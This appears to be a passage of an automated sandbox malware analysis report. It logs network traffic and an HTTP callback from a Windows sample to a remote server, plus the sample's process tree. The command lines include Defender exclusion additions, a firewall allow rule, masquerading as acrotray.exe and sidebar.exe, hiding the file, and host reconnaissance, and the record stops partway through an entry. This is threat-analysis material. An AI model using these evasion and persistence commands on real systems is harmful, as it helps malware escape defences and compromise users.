Jan 14, 2022 19:11:34.790941954 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:47.686625004 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:47.743113995 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:49.884005070 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:49.884129047 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.420911074 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.477381945 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:50.477534056 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.932284117 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.989042044 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.353740931 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.588341951 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:51.642314911 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.642400026 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:54.373760939 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:54.425156116 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:57.718404055 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:57.758157015 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:58.930190086 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:58.987181902 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:58.987879992 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:04.818032026 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:04.874435902 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:04.953682899 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:04.996277094 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:05.621375084 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:05.678320885 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:08.486728907 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:08.680119991 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:10.361368895 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:10.418006897 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:11.778111935 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:11.834145069 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:14.003263950 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:14.059753895 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:14.803855896 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:14.846776009 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:16.463815928 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:16.520467997 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:17.875608921 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:17.925992012 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:20.092966080 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:20.093099117 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:21.388849020 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:21.434753895 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:24.425477028 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:24.468317986 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.421443939 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.466538906 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:25.466624022 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.478267908 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:27.443866968 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:27.486454010 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.189610004 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.189863920 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.265495062 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.265763044 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.459825039 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.504183054 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.223900080 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.274924994 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.280040026 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:31.280154943 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.330987930 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:31.331149101 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:33.478296041 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:33.520126104 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:34.886312008 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:34.942558050 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:36.515907049 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:36.556416988 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:36.861457109 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:36.920067072 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:37.064465046 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:37.120906115 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:37.122276068 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:37.178709984 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:39.542526007 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:39.583163977 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:42.552423954 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:42.594436884 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:45.195693970 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:45.252516031 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:45.903798103 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:45.955523968 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:48.963511944 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.021083117 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:49.841991901 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.842220068 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:49.842771053 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.842871904 CET	49757	60601	192.168.2.3	185.112.83.96

HTTP Request Dependency Graph

185.112.83.96:20000

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49751	185.112.83.96	20000	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 19:11:34.691591024 CET	1129	OUT	POST /callback HTTP/1.1 Host: 185.112.83.96:20000 User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Data Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV
Jan 14, 2022 19:11:34.750452042 CET	1129	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 18:11:34 GMT Content-Length: 0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe PID: 4356 Parent PID: 4764

General

Start time:	19:11:30
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Imagebase:	0x400000
File size:	1843200 bytes
MD5 hash:	8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: cmd.exe PID: 6516 Parent PID: 4356

General

Start time:	19:11:31
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7072 Parent PID: 4356

General

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6732 Parent PID: 6516

General

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 3696 Parent PID: 7072

General

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 1068 Parent PID: 6516

General

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exe PID: 3180 Parent PID: 4356

General

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 5556 Parent PID: 4356

General

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5536 Parent PID: 3180

General

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4828 Parent PID: 5556

General

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: whoami.exe PID: 2132 Parent PID: 3180

General

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: netsh.exe PID: 2056 Parent PID: 5556

General

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Imagebase:	0x7ff6e9d70000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5792 Parent PID: 4356

General

Start time:	19:11:34
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6000 Parent PID: 5792

General

Start time:	19:11:34
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4896 Parent PID: 4356

General

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "ipconfig //flushdns"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5268 Parent PID: 5792

General

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4232 Parent PID: 4356

General

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6116 Parent PID: 4896

General

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 720 Parent PID: 4232

General

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ipconfig.exe PID: 924 Parent PID: 4896

General

Start time:	19:11:36
Start date:	14/01/2022
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig //flushdns
Imagebase:	0x7ff652f30000
File size:	34304 bytes
MD5 hash:	C7FAFF418EF7AD7ABDA10A5BCF9B53EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3952 Parent PID: 4356

General

Start time:	19:11:36
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 1860 Parent PID: 4232

General

Start time:	19:11:36
Start date:	14/01/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:	0x7ff7f2ad0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7120 Parent PID: 3952

General

Start time:	19:11:36
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 4488 Parent PID: 3952

General

Start time:	19:11:37
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic cpu get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 7076 Parent PID: 4356

General

Start time:	19:11:37
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2956 Parent PID: 4356

General

Start time:	19:11:37
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4768 Parent PID: 7076

General

Start time:	19:11:38
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6592 Parent PID: 2956

General

Start time:	19:11:38
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 5556 Parent PID: 7076

General

Start time:	19:11:39
Start date:	14/01/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +S +H C:\Windows\acrotray.exe
Imagebase:	0x7ff7e1670000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 5616 Parent PID: 2956

General

Start time:	19:11:39
Start date:	14/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cmd.exe PID: 6328 Parent PID: 4356

General

Start time:	19:11:40
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6000 Parent PID: 6328

General

Start time:	19:11:40
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 2328 Parent PID: 6328

General

Start time:	19:11:41
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5624 Parent PID: 4356

General

Start time:	19:11:43
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C ver
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4960 Parent PID: 5624

General

Start time:	19:11:43
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4768 Parent PID: 4356

General

Start time:	19:11:46
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7080 Parent PID: 4768

General

Start time:	19:11:46
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: acrotray.exe PID: 7120 Parent PID: 3352

General

Start time:	19:11:47
Start date:	14/01/2022
Path:	C:\Windows\acrotray.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\acrotray.exe"
Imagebase:	0x400000
File size:	1843200 bytes
MD5 hash:	8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exe PID: 5092 Parent PID: 4768

General

Start time:	19:11:48
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 6732 Parent PID: 7120

General

Start time:	19:11:49
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2504 Parent PID: 7120

General

Start time:	19:11:50
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 1312 Parent PID: 6732

General

Start time:	19:11:50
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 1864 Parent PID: 2504

General

Start time:	19:11:50
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 924 Parent PID: 7120

General

Start time:	19:11:50
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C whoami
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 3200 Parent PID: 6732

General

Start time:	19:11:50
